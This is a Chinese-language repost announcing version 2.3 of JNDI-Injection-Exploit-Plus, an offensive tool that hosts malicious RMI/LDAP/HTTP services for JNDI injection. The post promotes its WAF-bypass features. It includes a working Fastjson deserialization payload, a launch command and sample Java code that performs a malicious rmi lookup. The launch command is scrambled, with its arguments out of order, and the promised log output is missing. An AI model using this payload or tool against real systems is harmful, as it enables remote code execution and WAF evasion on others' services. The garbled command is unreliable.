描述
JNDI-Injection-Exploit-Plus是一个用于生成可行的JNDI链接并通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务的工具。使用这个工具可以让你获得JNDI链接,你可以将这些链接插入到你的POC中来测试漏洞。
JNDI-Injection-Exploit-Plus-2.3此次更新内容:
1.新功能:新标志“-F”将类名融合在字节中以绕过WAF。
2.删除敏感信息以绕过 WAF。
例如,这是一个 Fastjson vul-poc:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
我们可以将“rmi://127.0.0.1:1099/Object”替换为JNDI-Injection-Exploit-Plus生成的链接来测试漏洞。
此外,您还可以使用 JNDI-Injection-Exploit-Plus 生成base64/hex 类型的有效负载,如ysoserial
不仅仅是JNDI 注入利用
JNDI-Injection-Exploit是一个很棒的工具,这是它的增强版。
例子-JNDI 链接
1.本地演示,像这样启动该工具:
"/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C
2.假设我们将步骤 1 中生成的 rmi://ADDRESS/remoteExploit8 等 JNDI 链接注入到可能受到 JNDI 注入攻击的易受攻击的应用程序中。
在这个例子中,它看起来像这样:
class Test{
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
}
}
然后当我们运行这段代码时,命令将被执行,
日志将在 shell 中打印:
项目地址:
https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/releases/tag/2.3
原文始发于微信公众号(Ots安全):JNDI-Injection-Exploit-Plus v2.3 发布:融合字节中以绕过WAF,删除敏感信息以绕过 WAF
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论